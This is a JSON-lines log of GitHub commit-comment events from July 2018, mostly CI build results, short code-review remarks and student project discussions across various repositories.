{"id":"7912642633","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29581081,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-03T13:40:19Z","updated_at":"2018-07-03T13:40:19Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 224](https://teamcity.otenv.com/viewLog.html?buildId=8855900&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 34 Build time: 00:01:19"}},"created_at":"2018-07-03T13:40:19Z"}
{"id":"7912643070","type":"CommitCommentEvent","actor":{"login":"aslakhellesoy"},"repo":{"name":"cucumber/cucumber-java-skeleton"},"payload":{"comment":{"id":29581083,"position":null,"line":null,"path":null,"commit_id":"e163b28ae2f91128c4d739e5a297f2779897072c","created_at":"2018-07-03T13:40:23Z","updated_at":"2018-07-03T13:40:23Z","author_association":"CONTRIBUTOR","body":"It only actually sends if a CI environment is enabled, and the auth token is valid. If someone clones this and puts it in their own CI it won't work, because the encrypted token won't decrypt in a different repo."}},"created_at":"2018-07-03T13:40:23Z"}
{"id":"7912646170","type":"CommitCommentEvent","actor":{"login":"ImplicitDeny"},"repo":{"name":"lamuerta/LM-Warfare"},"payload":{"comment":{"id":29581097,"position":null,"line":null,"path":null,"commit_id":"96009921050c8083befa945512ab042c3b9647ff","created_at":"2018-07-03T13:40:53Z","updated_at":"2018-07-03T13:40:53Z","author_association":"COLLABORATOR","body":"Fixes #4 "}},"created_at":"2018-07-03T13:40:53Z"}
{"id":"7912647349","type":"CommitCommentEvent","actor":{"login":"lunavazquez"},"repo":{"name":"lunavazquez/cdmx-2018-06-bc-core-am-data-dashboard"},"payload":{"comment":{"id":29581102,"position":null,"line":null,"path":null,"commit_id":"6ddd70cc1aef2b313443c2d9d7b3591ab1e241d8","created_at":"2018-07-03T13:41:04Z","updated_at":"2018-07-03T13:41:04Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-03T13:41:04Z"}
{"id":"7912651883","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29581113,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-03T13:41:46Z","updated_at":"2018-07-03T13:41:46Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 191](https://teamcity.otenv.com/viewLog.html?buildId=8855905&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 8 Build time: 00:01:30\n### Failed tests\n```\ncom.opentable.kafka.util.OffsetMetricsTest.testMissingTopic: <no details avaliable>\n\n```\n"}},"created_at":"2018-07-03T13:41:46Z"}
{"id":"7912655449","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29581126,"position":null,"line":null,"path":null,"commit_id":"e7181d491d8a431eb2bc23652f9c2c491cb6d7c5","created_at":"2018-07-03T13:42:21Z","updated_at":"2018-07-03T13:42:21Z","author_association":"MEMBER","body":"@flyinghead Progress in Samurai Shodown VI now too (a Naomi-to-Atomiswave conversion) - the background is beginning to appear now -\r\n\r\n![image](https://user-images.githubusercontent.com/1075274/42223264-a40a4030-7ed7-11e8-96d6-ad9fdae8f1af.png)\r\n\r\nStill no foreground sprites on top of the background though (the player characters, HUD, etc.)"}},"created_at":"2018-07-03T13:42:21Z"}
{"id":"7912655709","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29581127,"position":8,"line":8,"path":"tests/HelloWorldTest.php","commit_id":"7ed44125b9095290ab926eead6392cb4ceb9ff39","created_at":"2018-07-03T13:42:23Z","updated_at":"2018-07-03T13:42:23Z","author_association":"NONE","body":"As it is now, the test is testing itself, its own correctness.\r\n\r\nWhat you want is to test the system under testing - that is the code under `src/`.\r\n\r\nSo instead of line 8, you have two lines: instantiate the HelloWorld class and call the method which creates that output."}},"created_at":"2018-07-03T13:42:23Z"}
{"id":"7912656647","type":"CommitCommentEvent","actor":{"login":"MoneroOcean"},"repo":{"name":"MoneroOcean/xmr-node-proxy"},"payload":{"comment":{"id":29581129,"position":null,"line":null,"path":null,"commit_id":"045f7e0a65d8e8ec78e2d8de94f76c5386539e98","created_at":"2018-07-03T13:42:32Z","updated_at":"2018-07-03T13:42:32Z","author_association":"OWNER","body":":)"}},"created_at":"2018-07-03T13:42:32Z"}
{"id":"7912660184","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29581142,"position":null,"line":null,"path":null,"commit_id":"6d5a7d90aa501821224c1e04a2a5a13d22c631dd","created_at":"2018-07-03T13:43:06Z","updated_at":"2018-07-03T13:43:06Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n        {\n          \"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n            \"queue:task-group-id:taskcluster-github/cnxuMaNxSlWSTJgs_kQmqg\",\n            \"queue:schedule-task:taskcluster-github/cnxuMaNxSlWSTJgs_kQmqg/cnxuMaNxSlWSTJgs_kQmqg\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/servo/servo:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/servo\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:task-group-id:taskcluster-github/cnxuMaNxSlWSTJgs_kQmqg\",\n                \"queue:schedule-task:taskcluster-github/cnxuMaNxSlWSTJgs_kQmqg/cnxuMaNxSlWSTJgs_kQmqg\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-03T13:43:05.925Z\n\n</details>"}},"created_at":"2018-07-03T13:43:06Z"}
{"id":"7912662600","type":"CommitCommentEvent","actor":{"login":"wazdevelopment"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29581152,"position":58,"line":58,"path":"FPR-0081.md","commit_id":"5a9eea6ce833ca6512ee7aa2b6ae175b8704936d","created_at":"2018-07-03T13:43:28Z","updated_at":"2018-07-03T13:43:28Z","author_association":"CONTRIBUTOR","body":"COST 25k in pounds \r\n\r\noffice rental space for university course and seminars on bitcoin cash £10,000\r\n\r\nonline web developments .design costs - £2,000\r\n\r\nexternal project management software and running cost -1,000\r\n\r\ncourse verification and deployment costs - 2,000\r\n\r\nadvertising and marketing external costs - 5,000\r\n\r\nvolunteer expenses and travel costs- 5,000\r\n\r\ntotal year 1 costs of £25,000\r\n\r\nyear 2 we aim to be self efficient using the courses and social media to generate revenue for the foundation."}},"created_at":"2018-07-03T13:43:28Z"}
{"id":"7912664612","type":"CommitCommentEvent","actor":{"login":"divyanshuvats"},"repo":{"name":"divyanshuvats/ImageClassification"},"payload":{"comment":{"id":29581157,"position":null,"line":null,"path":null,"commit_id":"5662e8a25116c1f586c01fcf52e296542ef40d01","created_at":"2018-07-03T13:43:47Z","updated_at":"2018-07-03T13:43:47Z","author_association":"OWNER","body":"I have used Convolutional Neural Network for this task which takes in the images and resizes them to 100*100 and then processess them to find it with an efficient accuracy.\r\n"}},"created_at":"2018-07-03T13:43:47Z"}
{"id":"7912665072","type":"CommitCommentEvent","actor":{"login":"DominikaK"},"repo":{"name":"ezsystems/developer-documentation"},"payload":{"comment":{"id":29581158,"position":6,"line":52,"path":"docs/guide/bundles.md","commit_id":"bec3e782fe1e159ec2175a414ef8aee5625e357f","created_at":"2018-07-03T13:43:52Z","updated_at":"2018-07-03T13:43:52Z","author_association":"CONTRIBUTOR","body":"`ezplatform-admin-ui-assets` also belongs to v2"}},"created_at":"2018-07-03T13:43:52Z"}
{"id":"7912667451","type":"CommitCommentEvent","actor":{"login":"2507458031"},"repo":{"name":"2507458031/idea_git_c118"},"payload":{"comment":{"id":29581164,"position":4,"line":10,"path":"src/main/java/com/baizhi/dao/UserDao.java","commit_id":"71f9cae117a1d100d0d9d3d5104afcda388b573d","created_at":"2018-07-03T13:44:15Z","updated_at":"2018-07-03T13:44:15Z","author_association":"OWNER","body":"public void m2(){}"}},"created_at":"2018-07-03T13:44:15Z"}
{"id":"7912669981","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29581171,"position":78,"line":21673,"path":"storage/innobase/handler/ha_innodb.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T13:44:38Z","updated_at":"2018-07-03T13:44:38Z","author_association":"CONTRIBUTOR","body":"I think that it would be clearer to just do\r\n```c\r\ntable->release();\r\nreturn NULL;\r\n```\r\nhere, and declare `unaccessible` only after the `retry_mdl:` label."}},"created_at":"2018-07-03T13:44:38Z"}
{"id":"7912674457","type":"CommitCommentEvent","actor":{"login":"nikitosbobin"},"repo":{"name":"repitch/somemapapp"},"payload":{"comment":{"id":29581185,"position":5,"line":22,"path":"app/src/main/java/com/bobin/somemapapp/infrastructure/PointWatchedServiceImpl.java","commit_id":"22392264548944033a6869efab3765f5df148e69","created_at":"2018-07-03T13:45:22Z","updated_at":"2018-07-03T13:45:22Z","author_association":"NONE","body":"там же надо в каждом потоке доставать свой экземпляр реалма"}},"created_at":"2018-07-03T13:45:22Z"}
{"id":"7912676868","type":"CommitCommentEvent","actor":{"login":"YachnikAlexander"},"repo":{"name":"YachnikAlexander/Training-Summer-Express-2018-C-"},"payload":{"comment":{"id":29581189,"position":37,"line":37,"path":"NET.S.2018.YACHNIK.03/PowNewtonMethod/FindingNRoot/RootNDegree.cs","commit_id":"66971dfe2ef0af92deffdd53c637cfd1a655ffc5","created_at":"2018-07-03T13:45:44Z","updated_at":"2018-07-03T13:45:44Z","author_association":"OWNER","body":"2 половина метода нужна для того, чтобы число округлить до нужной точности, так как при выходе с этого цикла я проверил, что к примеру для 8 корень из 3 возвращается 2.000000421, хотя и точность 0,001. Поэтому Ms tests у меня не проходили, а NUnit проходили. Но я увидел перегруженный метод AreEqual у Assert с accurancy. Исправил)\r\n"}},"created_at":"2018-07-03T13:45:44Z"}
{"id":"7912678982","type":"CommitCommentEvent","actor":{"login":"YachnikAlexander"},"repo":{"name":"YachnikAlexander/Training-Summer-Express-2018-C-"},"payload":{"comment":{"id":29581192,"position":130,"line":130,"path":"NET.S.2018.YACHNIK.03/PowNewtonMethod/FindingNRoot/RootNDegree.cs","commit_id":"66971dfe2ef0af92deffdd53c637cfd1a655ffc5","created_at":"2018-07-03T13:46:05Z","updated_at":"2018-07-03T13:46:05Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-03T13:46:05Z"}
{"id":"7912678985","type":"CommitCommentEvent","actor":{"login":"nikitosbobin"},"repo":{"name":"repitch/somemapapp"},"payload":{"comment":{"id":29581193,"position":9,"line":8,"path":"app/src/main/java/com/bobin/somemapapp/model/CameraBounds.java","commit_id":"22392264548944033a6869efab3765f5df148e69","created_at":"2018-07-03T13:46:05Z","updated_at":"2018-07-03T13:46:05Z","author_association":"NONE","body":"чтобы не вычислять каждый раз, решил сохранять, раз нам его уже предоставляют"}},"created_at":"2018-07-03T13:46:05Z"}
{"id":"7912684164","type":"CommitCommentEvent","actor":{"login":"YachnikAlexander"},"repo":{"name":"YachnikAlexander/Training-Summer-Express-2018-C-"},"payload":{"comment":{"id":29581205,"position":5,"line":5,"path":"NET.S.2018.YACHNIK.03/PowNewtonMethod/NunitNRootTests/UnitTest1.cs","commit_id":"66971dfe2ef0af92deffdd53c637cfd1a655ffc5","created_at":"2018-07-03T13:46:54Z","updated_at":"2018-07-03T13:46:54Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-03T13:46:54Z"}
{"id":"7912687245","type":"CommitCommentEvent","actor":{"login":"OPARA-PROSPER"},"repo":{"name":"Onyiih/Pixel-Art-Maker"},"payload":{"comment":{"id":29581213,"position":null,"line":null,"path":null,"commit_id":"9a9a8cf1d2860211477c327d0db252faccebd0af","created_at":"2018-07-03T13:47:23Z","updated_at":"2018-07-03T13:47:23Z","author_association":"NONE","body":"You did great with version control.. But let me chip this in, Learn to write `meaningful commit messages`.. For instance a better way for this particular commit could be `I updated the Completed section of the readme.md file to effect a correction to the link to the hosted github page`"}},"created_at":"2018-07-03T13:47:23Z"}
{"id":"7912689472","type":"CommitCommentEvent","actor":{"login":"nikitosbobin"},"repo":{"name":"repitch/somemapapp"},"payload":{"comment":{"id":29581220,"position":5,"line":12,"path":"app/src/main/java/com/bobin/somemapapp/model/response/DepositionPartnerResponse.java","commit_id":"22392264548944033a6869efab3765f5df148e69","created_at":"2018-07-03T13:47:44Z","updated_at":"2018-07-03T13:47:44Z","author_association":"NONE","body":"мне их нагенерил http://www.jsonschema2pojo.org/, а убрать забыл ("}},"created_at":"2018-07-03T13:47:44Z"}
{"id":"7912690726","type":"CommitCommentEvent","actor":{"login":"elena"},"repo":{"name":"technige/py2neo"},"payload":{"comment":{"id":29581222,"position":null,"line":null,"path":null,"commit_id":"47f8457c2594cb3fe7d17987e7cecd55717d420f","created_at":"2018-07-03T13:47:56Z","updated_at":"2018-07-03T13:47:56Z","author_association":"NONE","body":"Yay! Thank you!"}},"created_at":"2018-07-03T13:47:56Z"}
{"id":"7912690866","type":"CommitCommentEvent","actor":{"login":"sandy081"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29581224,"position":null,"line":null,"path":null,"commit_id":"3962b545e89b373168ba5d7ff08b7e340879ef4b","created_at":"2018-07-03T13:47:58Z","updated_at":"2018-07-03T13:47:58Z","author_association":"MEMBER","body":"@dbaeumer Pushed the fix for not getting recommendation in Simplified Chinese language. Take a look."}},"created_at":"2018-07-03T13:47:58Z"}
{"id":"7912692285","type":"CommitCommentEvent","actor":{"login":"brownian"},"repo":{"name":"hpimr/hpimr"},"payload":{"comment":{"id":29581228,"position":5,"line":35,"path":"007.asc","commit_id":"a0e565b42b41a092faed2bd22553fe6cda9ffb53","created_at":"2018-07-03T13:48:11Z","updated_at":"2018-07-03T13:48:11Z","author_association":"CONTRIBUTOR","body":"https://github.com/hpimr/hpimr/pull/346"}},"created_at":"2018-07-03T13:48:11Z"}
{"id":"7912692549","type":"CommitCommentEvent","actor":{"login":"wazdevelopment"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29581231,"position":108,"line":108,"path":"FPR-0081.md","commit_id":"5a9eea6ce833ca6512ee7aa2b6ae175b8704936d","created_at":"2018-07-03T13:48:14Z","updated_at":"2018-07-03T13:48:14Z","author_association":"CONTRIBUTOR","body":"impact \r\neducated the general public and bitcoin cash entrepreneur on peer to peer cash system make bitcoin cash the number 1 cryptocurrency in the marketplace, educate users on how to program and develop in block chain technology, expand bitcoin cash education to general public and raise awareness for the marketplace."}},"created_at":"2018-07-03T13:48:14Z"}
{"id":"7912693223","type":"CommitCommentEvent","actor":{"login":"nikitosbobin"},"repo":{"name":"repitch/somemapapp"},"payload":{"comment":{"id":29581241,"position":3,"line":3,"path":"app/src/main/java/com/bobin/somemapapp/model/response/DepositionPartnersResponse.java","commit_id":"22392264548944033a6869efab3765f5df148e69","created_at":"2018-07-03T13:48:20Z","updated_at":"2018-07-03T13:48:20Z","author_association":"NONE","body":"чтобы в интерфейсе апишки не было миллиарда дженериков, чтобы было читаеемее"}},"created_at":"2018-07-03T13:48:20Z"}
{"id":"7912695625","type":"CommitCommentEvent","actor":{"login":"nikitosbobin"},"repo":{"name":"repitch/somemapapp"},"payload":{"comment":{"id":29581244,"position":5,"line":92,"path":"app/src/main/java/com/bobin/somemapapp/presenter/MapPresenter.java","commit_id":"22392264548944033a6869efab3765f5df148e69","created_at":"2018-07-03T13:48:42Z","updated_at":"2018-07-03T13:48:42Z","author_association":"NONE","body":"привычка (("}},"created_at":"2018-07-03T13:48:42Z"}
{"id":"7912697399","type":"CommitCommentEvent","actor":{"login":"andreyij"},"repo":{"name":"CUBRID/cubrid"},"payload":{"comment":{"id":29581251,"position":4,"line":3330,"path":"src/transaction/boot_sr.c","commit_id":"d1f9478476092f9c34bc2559ef782ab5b470a3bb","created_at":"2018-07-03T13:48:59Z","updated_at":"2018-07-03T13:48:59Z","author_association":"NONE","body":"Great change!"}},"created_at":"2018-07-03T13:48:59Z"}
{"id":"7912697405","type":"CommitCommentEvent","actor":{"login":"atodorov-storpool"},"repo":{"name":"abelCoronado93/one"},"payload":{"comment":{"id":29581252,"position":null,"line":null,"path":null,"commit_id":"72fd770c276fe7b045e473693835c02fb26dc09c","created_at":"2018-07-03T13:48:59Z","updated_at":"2018-07-03T13:48:59Z","author_association":"NONE","body":"Hi, \r\nPlease take a look at https://github.com/OpenNebula/one/issues/2238#issuecomment-402163636"}},"created_at":"2018-07-03T13:48:59Z"}
{"id":"7912702325","type":"CommitCommentEvent","actor":{"login":"nikitosbobin"},"repo":{"name":"repitch/somemapapp"},"payload":{"comment":{"id":29581256,"position":17,"line":102,"path":"app/src/main/java/com/bobin/somemapapp/presenter/MapPresenter.java","commit_id":"22392264548944033a6869efab3765f5df148e69","created_at":"2018-07-03T13:49:46Z","updated_at":"2018-07-03T13:49:46Z","author_association":"NONE","body":"если хотя бы один раз прилетит уведомление в onError, после него умирает вся цепочка, а мне не хотелось этого"}},"created_at":"2018-07-03T13:49:46Z"}
{"id":"7912708741","type":"CommitCommentEvent","actor":{"login":"bazzakay"},"repo":{"name":"acidhax/chromecast-audio-stream"},"payload":{"comment":{"id":29581269,"position":null,"line":null,"path":null,"commit_id":"065c303987346d2e41284815d7a6bae5f8b95144","created_at":"2018-07-03T13:50:48Z","updated_at":"2018-07-03T13:50:48Z","author_association":"NONE","body":"Thanks to all for their work on this project.  Sadly, I cannot register the 64 bit dll using elevated cmd. I can connect and hear the chime but no audio is being cast to the chromecast audio device. I browsed to the syem32 directory (elevated) and ensured i was pointing the correct path and dll name to no avail. I'm on the latest release of win 10 x64 as at 03/07/18 (version 1803-OS build 17134.112)  I receive an error from windows that: the module \"audio_sniffer-x64.dll\" may not compatible with the version of Windows that you're running. Check if the module is compatible with an x86 (32-bit) or x64 (64-bit) version of regsvr32.exe. Any help greatly appreciated!\r\n"}},"created_at":"2018-07-03T13:50:48Z"}
{"id":"7912711662","type":"CommitCommentEvent","actor":{"login":"psilveirapsilveira"},"repo":{"name":"psilveirapsilveira/JST-395080"},"payload":{"comment":{"id":29581274,"position":null,"line":null,"path":null,"commit_id":"099976c2e178a912ac60611437f14becc970f44c","created_at":"2018-07-03T13:51:16Z","updated_at":"2018-07-03T13:51:16Z","author_association":"OWNER","body":"test comment"}},"created_at":"2018-07-03T13:51:16Z"}
{"id":"7912712560","type":"CommitCommentEvent","actor":{"login":"dbaeumer"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29581276,"position":null,"line":null,"path":null,"commit_id":"3962b545e89b373168ba5d7ff08b7e340879ef4b","created_at":"2018-07-03T13:51:24Z","updated_at":"2018-07-03T13:51:24Z","author_association":"MEMBER","body":"LGTM. Minor comment: `extensionIdPrefix` could be named `extensionIdPostfix`. "}},"created_at":"2018-07-03T13:51:24Z"}
{"id":"7912712844","type":"CommitCommentEvent","actor":{"login":"XM-XiaoMa"},"repo":{"name":"XM-XiaoMa/JUNHAI_DaliyLog"},"payload":{"comment":{"id":29581277,"position":null,"line":null,"path":null,"commit_id":"614ca92cbc5b8927cc841198afa723882ba00d5a","created_at":"2018-07-03T13:51:27Z","updated_at":"2018-07-03T13:51:27Z","author_association":"OWNER","body":"permit"}},"created_at":"2018-07-03T13:51:27Z"}
{"id":"7912717321","type":"CommitCommentEvent","actor":{"login":"marcinczeczko"},"repo":{"name":"Knotx/knotx-example-project"},"payload":{"comment":{"id":29581289,"position":8,"line":7,"path":".travis.yml","commit_id":"dd93874c09a0df6a190caaa484f2681317c53bd2","created_at":"2018-07-03T13:52:10Z","updated_at":"2018-07-03T13:52:10Z","author_association":"MEMBER","body":"Can't we go into one tool instead maven & gradle ? Btw. there is jacoco plugin for gradle: https://docs.gradle.org/current/userguide/jacoco_plugin.html"}},"created_at":"2018-07-03T13:52:10Z"}
{"id":"7912718005","type":"CommitCommentEvent","actor":{"login":"obber"},"repo":{"name":"delmontz/it-calendar"},"payload":{"comment":{"id":29581290,"position":null,"line":null,"path":null,"commit_id":"1f1152d2f54bbb4491d81cdcacaf7ad3b49f1172","created_at":"2018-07-03T13:52:16Z","updated_at":"2018-07-03T13:52:16Z","author_association":"NONE","body":"コンテーナーコンポーネントを少しいじって試したみたいですね！用意できたらdev -> master のPRとjira に投稿するのをお願いします！\r\n\r\nこれは五日前みたいでしたけど、他のコンテーナーコンポーネントは進みましたか？\r\n\r\nいつでも質問してくださいね！できるだけ手伝いたいので :)"}},"created_at":"2018-07-03T13:52:16Z"}
{"id":"7912718852","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29581294,"position":null,"line":null,"path":null,"commit_id":"de3daacd3abf2c6c6a131e705aa23af0297d83dd","created_at":"2018-07-03T13:52:24Z","updated_at":"2018-07-03T13:52:24Z","author_association":"OWNER","body":"Thanks all!!\r\n@locutus2 \r\nYou read my mind...I plan on doing just that."}},"created_at":"2018-07-03T13:52:24Z"}
{"id":"7912720219","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29581300,"position":52,"line":21647,"path":"storage/innobase/handler/ha_innodb.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T13:52:36Z","updated_at":"2018-07-03T13:52:36Z","author_association":"CONTRIBUTOR","body":"This could be\r\n```c++\r\nretry_mdl:\r\n\tconst bool unaccessible = !table->is_readable() || table->corrupted();\r\n\ttable->release();\r\n\tif (unaccessible) {\r\n\t\tif (mdl_acquire) {\r\n\t\t\tclose_purge_table(thd);\r\n\t \t}\r\n\t\treturn NULL;\r\n\t}\r\n```"}},"created_at":"2018-07-03T13:52:36Z"}
{"id":"7912720376","type":"CommitCommentEvent","actor":{"login":"nikitosbobin"},"repo":{"name":"repitch/somemapapp"},"payload":{"comment":{"id":29581302,"position":6,"line":111,"path":"app/src/main/java/com/bobin/somemapapp/ui/activity/DepositionPointsActivity.java","commit_id":"22392264548944033a6869efab3765f5df148e69","created_at":"2018-07-03T13:52:38Z","updated_at":"2018-07-03T13:52:38Z","author_association":"NONE","body":"косяк, согласен, но в данной ситуации я был уверен, что 2 инстанса не будет, если предполагалось бы, что их будет много, то я бы решал проблему по другому. Но искать по тэгу действительно гораздо удобнее и правильнее"}},"created_at":"2018-07-03T13:52:38Z"}
{"id":"7912720995","type":"CommitCommentEvent","actor":{"login":"wazdevelopment"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29581303,"position":91,"line":91,"path":"FPR-0081.md","commit_id":"5a9eea6ce833ca6512ee7aa2b6ae175b8704936d","created_at":"2018-07-03T13:52:44Z","updated_at":"2018-07-03T13:52:44Z","author_association":"CONTRIBUTOR","body":"we currently have strong team of volunteers and professional who have experienced and great background working in the educational and software development industry. we will still need verification of our courses so we are offering a great education to our users and making bitcoin cash a crypto coin that users educated on its uses and benefits, plus offering advanced courses so the overall bitcoin cash has educated users and skills that meet the requirements of the job market and to continue the development of the ecosystem of bitcoin cash."}},"created_at":"2018-07-03T13:52:44Z"}
{"id":"7912721506","type":"CommitCommentEvent","actor":{"login":"yyyyyn"},"repo":{"name":"yyyyyn/testgit2"},"payload":{"comment":{"id":29581306,"position":null,"line":null,"path":null,"commit_id":"7e01580c818a98c446f94bdf53ccbd12904ad5e4","created_at":"2018-07-03T13:52:49Z","updated_at":"2018-07-03T13:52:49Z","author_association":"OWNER","body":"this is test git2"}},"created_at":"2018-07-03T13:52:49Z"}
{"id":"7912722379","type":"CommitCommentEvent","actor":{"login":"nikitosbobin"},"repo":{"name":"repitch/somemapapp"},"payload":{"comment":{"id":29581307,"position":5,"line":34,"path":"app/src/main/java/com/bobin/somemapapp/ui/fragment/DepositionPointsListFragment.java","commit_id":"22392264548944033a6869efab3765f5df148e69","created_at":"2018-07-03T13:52:58Z","updated_at":"2018-07-03T13:52:58Z","author_association":"NONE","body":"студия сгенерила ))"}},"created_at":"2018-07-03T13:52:58Z"}
{"id":"7912722854","type":"CommitCommentEvent","actor":{"login":"wazdevelopment"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29581311,"position":null,"line":null,"path":null,"commit_id":"5a9eea6ce833ca6512ee7aa2b6ae175b8704936d","created_at":"2018-07-03T13:53:02Z","updated_at":"2018-07-03T13:53:02Z","author_association":"CONTRIBUTOR","body":"changes done thank you "}},"created_at":"2018-07-03T13:53:02Z"}
{"id":"7912725269","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29581320,"position":55,"line":21650,"path":"storage/innobase/handler/ha_innodb.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T13:53:26Z","updated_at":"2018-07-03T13:53:26Z","author_association":"CONTRIBUTOR","body":"Can we get the `strlen()` computed as a byproduct of `dict_parse_tbl_name()`?"}},"created_at":"2018-07-03T13:53:26Z"}
{"id":"7912727031","type":"CommitCommentEvent","actor":{"login":"CooperStansbury"},"repo":{"name":"ICO-Scrub-Team/ICO"},"payload":{"comment":{"id":29581323,"position":null,"line":null,"path":null,"commit_id":"2242a8185c575354394d65625820c013fcdec782","created_at":"2018-07-03T13:53:42Z","updated_at":"2018-07-03T13:53:42Z","author_association":"COLLABORATOR","body":"Updated initials in 'term editor' property to full names."}},"created_at":"2018-07-03T13:53:42Z"}
{"id":"7912729112","type":"CommitCommentEvent","actor":{"login":"ilmirus"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29581325,"position":53,"line":53,"path":"libraries/stdlib/coroutines/jvm/src/kotlin/coroutines/jvm/internal/ContinuationImpl.kt","commit_id":"82a5063af8c8c0987ffd24a85b897d0647633153","created_at":"2018-07-03T13:54:00Z","updated_at":"2018-07-03T13:54:00Z","author_association":"CONTRIBUTOR","body":"This leaves `intercepted` unchanged. Replace `this` with `it` or use `apply`."}},"created_at":"2018-07-03T13:54:00Z"}
{"id":"7912730104","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_bbb"},"payload":{"comment":{"id":29581327,"position":null,"line":null,"path":null,"commit_id":"2f5a999b65871aaad7cd623d1cf573b8ecd03968","created_at":"2018-07-03T13:54:10Z","updated_at":"2018-07-03T13:54:10Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_bbb/4e0e969c-8b7f-40ce-9d73-8fb9f8bc2297\n"}},"created_at":"2018-07-03T13:54:10Z"}
